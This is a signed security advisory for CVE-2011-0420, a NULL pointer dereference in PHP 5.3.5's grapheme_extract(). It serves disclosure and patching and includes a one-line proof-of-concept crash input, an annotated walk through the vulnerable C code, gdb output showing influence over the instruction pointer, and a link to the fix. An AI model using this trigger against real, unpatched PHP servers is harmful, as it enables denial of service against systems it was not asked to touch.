-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ PHP 5.3.5 grapheme_extract() NULL Pointer Dereference ]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/
Date:
- - Dis.: 09.12.2010
- - Pub.: 17.02.2011

CVE: CVE-2011-0420
CERT: VU#210829

Affected Software:
- - PHP 5.3.5

Fixed: SVN

Original URL:
http://securityreason.com/achievement_securityalert/94


- --- 0.Description ---
Internationalization extension (further is referred as Intl) is a
wrapper for ICU library, enabling PHP programmers to perform
UCA-conformant collation and date/time/number/currency formatting in
their scripts.

grapheme_extract ? Function to extract a sequence of default grapheme
clusters from a text buffer, which must be encoded in UTF-8.


- --- 1. PoC for grapheme_extract() ---
grapheme_extract('a',-1);

Change length of first parameter to change rip.


- --- 2. grapheme_extract() NULL Pointer Dereference ---
As we can see in grapheme_extract(str,size)

- -grapheme_extract()--
...
  if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sl|llz", (char
**)&str, &str_len, &size, &extract_type, &lstart, &next) == FAILURE) {
<=== str='a' and size='-1'
...
  /* if the string is all ASCII up to size+1 - or str_len whichever is
first - then we are done.
    (size + 1 because the size-th character might be the beginning of a
grapheme cluster)
   */
  
  if ( -1 != grapheme_ascii_check(pstr, size + 1 < str_len ? size + 1 :
str_len ) ) { <=== ( size=-1+1=0 ) ===
        long nsize = ( size < str_len ? size : str_len );  <=== nsize = -1
    if ( NULL != next ) {
      ZVAL_LONG(next, start+nsize);
    }
    RETURN_STRINGL(((char *)pstr), nsize, 1); <=== CRASH POINT
  }
...
- -grapheme_extract()--

if we call to grapheme_ascii_check(pstr,0) where

- -grapheme_ascii_check()--
/* {{{ grapheme_ascii_check: ASCII check */
int grapheme_ascii_check(const unsigned char *day, int32_t len) <==== len=0
{
  int ret_len = len;
  while ( len-- ) {
  if ( *day++ > 0x7f )
    return -1;
  }

  return ret_len; <=== return 0
}
- -grapheme_ascii_check()--

then we get (int)0 in result and

long nsize = ( size < str_len ? size : str_len );

will be -1. Therefore,

    RETURN_STRINGL(((char *)pstr), nsize, 1);

give NULL pointer dereference here.

Changing length of first parameter of grapheme_extract(), we will also
change rip in memcpy(3).

(gdb) r -r 'grapheme_extract('a',-1);'
...
(gdb) x/i $rip
=> 0x7ffff5511d99 <memcpy+777>: mov    %rax,(%rdi)
(gdb) x/x $rax
0xf9891857a6e70f70:     Cannot access memory at address 0xf9891857a6e70f70
(gdb) x/x $rdi
0x11b2000:      Cannot access memory at address 0x11b2000
(gdb) r -r
'grapheme_extract('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa',-1);'
...
(gdb) x/i $rip
=> 0x7ffff5511d77 <memcpy+743>: mov    0x18(%rsi),%r10
(gdb) x/x $rsi
0x11b1fe8:      0x00000000

- --- 3. Fix ---
CVS
http://svn.php.net/viewvc?view=revision&revision=306449


- --- 4. Greets ---
Pierre, Stas, sp3x, infospec


- --- 5. Contact ---
Author: Maksymilian Arciemowicz [ SecurityReason.com ]

Email:
- - cxib {a\./t]securityreason[d=t} com

GPG:
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

http://securityreason.com/
http://cxib.net/

- -- 
Best Regards
pub   4096R/D6E5B530 2010-09-19
uid                  Maksymilian Arciemowicz (cx) <max@cxib.net>
sub   4096R/58BA663C 2010-09-19
-----BEGIN PGP SIGNATURE-----

iQIcBAEBAgAGBQJNXFm7AAoJEIO8+dzW5bUwqowP/iP7Hx8HCvX5YrZk9b1UzU81
imYH1r7m5Xs0SkPpPeT0UwYH9MTYI04UeD2cskkBwdCTBRNPEQlRNhJIN7WzxjYv
WGH9vyE7VQD0x3oeSszFRHFdGGQ13qVmfBXJfDk8K1UiLsgabvdr6M69keRB7GqU
tX/2z97P+hWuEuCmjDcFmqeGwpjxPF+4omupq5BavY6KBQTxjfw3ECLb4gAxYDko
PC2uKXZ6iEuqHEeUElTpRnQFTCnToKIPRfogCkN9+m8hLcdrnEnGQc1sdxHXgVqk
nR+RCxA5ph5BO1d3ceQg8e2BpRT9vAIXyQI3UWD5N6O2Go7TO5T3NAdliBe3aVVf
7Awd3UCdeX50bDLzs55yACAqjinAzOoLVbEKVHBR/S6ogSsNp+4wkkDUhdj8G6s9
EUEY2qlNBJe5bTenzV5oXgpZ9lPuTSlbRjogdXtmhHBhv3nCIO2kLr0QZ293QsHZ
TGp/jmhuiu67dIIgtnObZOIckmcYZZukQeOOjThvTqia0dlrOi3QK9/deTISAESc
HHRMpgz52ptnUTg8G8p0uvpkwa/riW4WE9tXN9LVQxPUmboMcuTrCQ1WMCgQit9R
i8ALu1+4RJnErC/Q0CdBZcEFnnFxOOoTPSen6SSFRFnY1uwCklGtQPpJdcgXfpBN
9aCz02ztmFBMPO+/YTzb
=H8sm
-----END PGP SIGNATURE-----